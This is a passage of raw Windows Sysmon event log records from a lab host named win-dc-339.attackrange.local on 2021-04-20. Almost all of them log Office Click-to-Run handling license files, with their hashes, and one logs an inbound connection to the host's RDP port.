AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentVNextR_Grace-ppd.xrm-msMD5=C883C5510ABE33058E9C3A9287B25973,SHA256=560F9DF80760BD54C505A58A818877B5C9AD5CE4E7F712A08178E10F99CA082A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Trial2-ul-oob.xrm-msMD5=3B2B97BB46AC535B6B2A142195F71E4E,SHA256=72E453FFE39BDAF43388D76374A1149ED4F6791B19C762389D7099087A24C508,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Trial2-ppd.xrm-msMD5=EAD8492D022BCED9312C9A68E6A7966E,SHA256=BA5F25E4A6D96F38AE5D1918F1C168D2F5ADAAC0444DBFCBDB4EEA60BBF0B537,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Trial2-pl.xrm-msMD5=4B4DB367ABB06907EA5F5B20C350D7E6,SHA256=1D36F1C7684F39F04DD9CD820902747F00397A759D7DEA144D53B96189EE8A5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Trial-ul-oob.xrm-msMD5=336422D43354DAD2F19FFF1FB7220DA9,SHA256=A769CD1D721794E9DB24BA21BA92860E4AB3DBFFC6D52129526C19387DAF89D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Trial-ppd.xrm-msMD5=DD14D316FA28CF65A7C11A3589A7E3E8,SHA256=F46A7B742F303840CBD39A2912D8E7958B57B502E0F310ABC370233AFFC0B043,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Trial-pl.xrm-msMD5=67C89555C49AE174B227B1EA2DFE9CBA,SHA256=F83E31981F2A597009F8D5CCA2B03DB6111430DD8C30FED052F9651B99C0085B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Retail-ul-phn.xrm-msMD5=9A0DB5C100FB7153A00F195775942579,SHA256=759E9003530E49616C5079AA8F159F77B320FFFD48996AC04160D91082D4C613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Retail-ul-oob.xrm-msMD5=978E4F84344A0DF353A6E3F79109CBF0,SHA256=045336E645CB2319B2EB19CEC58A438C581B81548BD291AE13187768CCE756FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Retail-ppd.xrm-msMD5=E653D96465ECCFD1DA5D4CDAF64038F9,SHA256=596172A43616E204C56B05134317F238751B4931C2F4C1C311FC548C667CC6A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Retail-pl.xrm-msMD5=FDC5585F533D7D41AE8AFBC9DA053389,SHA256=F187CA8FA279039ECC798AF8815F3705659FF0D0076050EA15AF3A1F6391FB41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_OEM_Perp-ul-phn.xrm-msMD5=A9EF6CE89D3BD11D0B33B91C275F9E9A,SHA256=B7A8CAA10B97BF789AFCDE911FA23AAB69B00264A51E611593F2D40AE6129999,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_OEM_Perp-ul-oob.xrm-msMD5=6B9E0642DB0DC2CDDA73BF0CB7614F31,SHA256=ABCAAD9387FF9A457D6A2D3FE194FA17098E15809A9B4DB4D39BE2C2D5321A1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_OEM_Perp-ppd.xrm-msMD5=84785B7316C513F6A97FEEC20CEA1B1A,SHA256=BFD08B2CFA052DEC2FE7CCA6E8ECB1EF24575A533CFB6AB67EF67FD40EABB74C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_OEM_Perp-pl.xrm-msMD5=1075EB6F00478D26EC03C95B51EC4B1F,SHA256=E608D62FF318EE5D1B41E0D3E524016516D05B8BACF9DE8AC4EAEEED1573246F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Grace-ul-oob.xrm-msMD5=8A516DA64480C28A305C7683A9BC542C,SHA256=B17B6EABA43103348F8D3F459AFBA8AD57BB09E8AA3775CF3D0D314AB5CB5899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentR_Grace-ppd.xrm-msMD5=114D0475ED75BF26186CA4C0711178B3,SHA256=1192EB49F86DAD922B2A9943427FA437544400A8051316BA18C4D7D50677B083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentDemoR_BypassTrial180-ul-oob.xrm-msMD5=39B501FCB4E5BCE2ADF4FA4822654DBB,SHA256=1A9E59F0BA0235221BCB01C708488512382BE76F8064B95BE5B8CC50848A793B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudentDemoR_BypassTrial180-ppd.xrm-msMD5=C2465E77AF71E5F2A6B5676833AF3CCD,SHA256=9A2334BC277EB4B9B60A6DB4FD5B755216640C9A539E4A86F0DF5F7F1CB69D90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_Trial-ul-oob.xrm-msMD5=3B10CF20D91C5D81E4015596B23EDE28,SHA256=7DD7C92191D5D88770C76E909F6B8913787B2D281795C459EE685B6C4006E4B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_Trial-ppd.xrm-msMD5=1139B945D367865411ADAF62A9E74FFB,SHA256=75125B10C8E9BB410A5A9F213D56CE68906E4B5CA7BBD97DCC2582D30D270F8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_Trial-pl.xrm-msMD5=BAC4465315E3F64B26D286184A5ECC7B,SHA256=C929913D495B158ED598E5BBB0707F61E8B107B0E219B05893DE976FB413EBCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_Retail-ul-phn.xrm-msMD5=5B164FA0DC43003175E2AC8F4E263229,SHA256=41B394758F73DAAF6857C95F10C2EF2F02E9F03C0C3C95B8D87B0CE91BA1C071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_Retail-ul-oob.xrm-msMD5=08EC7BE3B6392C050A4A1574061959FD,SHA256=62C2008CB03AF816D09FDFAEE717E04464E63E097242B009E4A7E9CF6512ED38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_Retail-ppd.xrm-msMD5=397AEE3D236562B2B36E6F48F16A337C,SHA256=C3F51B145F74079266BC50DA6CFEB4B06751C10F582AAD7C08C88AAE640C716F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_Retail-pl.xrm-msMD5=0C30622EE22E9C4EDA833104278CBEA1,SHA256=50926410AD685851FCAEA61CB21C10EEEE99DC6150A97C4985EF177C8DD19FC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-phn.xrm-msMD5=49CBD29E7E6ACEC18113C66D2AB997CF,SHA256=A01FE79E1C20A18EBEBDA7CD58B4468FCBA178B57FE268DEA5138D7EA47AA8DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-oob.xrm-msMD5=01EC6E9975C87EF8A45058DA825975EE,SHA256=54214E3AB38AFBC5A42386E229D85C0FEB9854C9319534BBA0C20273DC265322,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_OEM_Perp-ppd.xrm-msMD5=74A8274F9E2E6532CE4129D5F679FF65,SHA256=F073F0BD217451D2D133F8D514B78C8F7561038127598F59711B4FD90A40EF54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_OEM_Perp-pl.xrm-msMD5=9EE0CB955DE2EDE8DE7468A6BB730037,SHA256=5E830EB8ED702C05342F15BF28C638E0EB68C618F40587E4D724A16C20E5D202,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_Grace-ul-oob.xrm-msMD5=F52C5DB3532DAF84F4CF1117C2A4183E,SHA256=32DE0EBEA335F0706D2989300A786AEFB8B0E8BDA7C3AF9A2B8D28C4124E9602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019R_Grace-ppd.xrm-msMD5=114C80B6A39A2E907BF6EEAEE28CBDBD,SHA256=67CF03060BC4E0414F00C3F8A72B813E0DC93104EFB8EB4C9776DA7723DF9213,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019DemoR_BypassTrial180-ul-oob.xrm-msMD5=C15262767A6A597C31F6AB0FB82925B2,SHA256=830B7F8FD3A2996BD0EDA7DBD8654E339041B6F5CCD2BE2CBE55121CC3DAD6A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeStudent2019DemoR_BypassTrial180-ppd.xrm-msMD5=C7099CF156357930F16FAB0094C86CBA,SHA256=2DAE0912FC382E2F897A25762E1B965D22AC3A4E4CF6D56776EF050B167FC857,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Trial2-ul-oob.xrm-msMD5=9AB0F459BEE6242A1EC83ACE2489FB01,SHA256=069B854753071894CEF9E088D7F92D9BF8C8855118AB673BA1BC6D2E664A171F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Trial2-ppd.xrm-msMD5=925038163B4F49E280BD9FAFB7698A2B,SHA256=0CD92EA7FABF4AAD61B9C90D517FBB91E5DB0AFD009B7E0D16F838FAEA26ED2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000067108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.047{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-20848-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000067107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Trial2-pl.xrm-msMD5=E2AEFBA12D1A866A2C8D0003B3932D82,SHA256=6385DCFAF58FF09BAF93FFE95D4E3C09E72DF250AB02A621B3A19A09BADE2ADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Trial-ul-oob.xrm-msMD5=1232C540392E9254B748F3E7FAF0AF6A,SHA256=9AE4913C24C4E9D260F8A9B23DE1CC560E4AA8276F6A26B71CB4D97F44510FD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Trial-ppd.xrm-msMD5=988268CA8938F9CCD9DC43F3A0E2991F,SHA256=E93A3403F94A9D1FFCFF79AA34D1BF7758840997C7DFFC13E96226D3C81D4FC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Trial-pl.xrm-msMD5=88C46E2F900CC331C4C784273DC822F5,SHA256=31CC3796FC4C35DEC1CE5C03EB1AAAEB04EC1D103E4828A6F1BD21A37EEA61F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail3-ul-phn.xrm-msMD5=42E0059D784A451E3B5BC7A5DF1B5E74,SHA256=56D5D519D422268AD766C1E726F56A53F1658CA4A0591B29D110B62A0D293BF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail3-ul-oob.xrm-msMD5=292C459667AF60DA1E7595A5EAD4C927,SHA256=B4D5753AC43F94BD60CE59A658A42F7BE2B2C3ECFC5C65AC0510A820ACBB66F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail3-ppd.xrm-msMD5=A6178BAE773BCF3B43D379500BAF6721,SHA256=45B79BE0D8D6FDFD47CF316E5CA864244DC38C70201798A2A29641383E067BC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 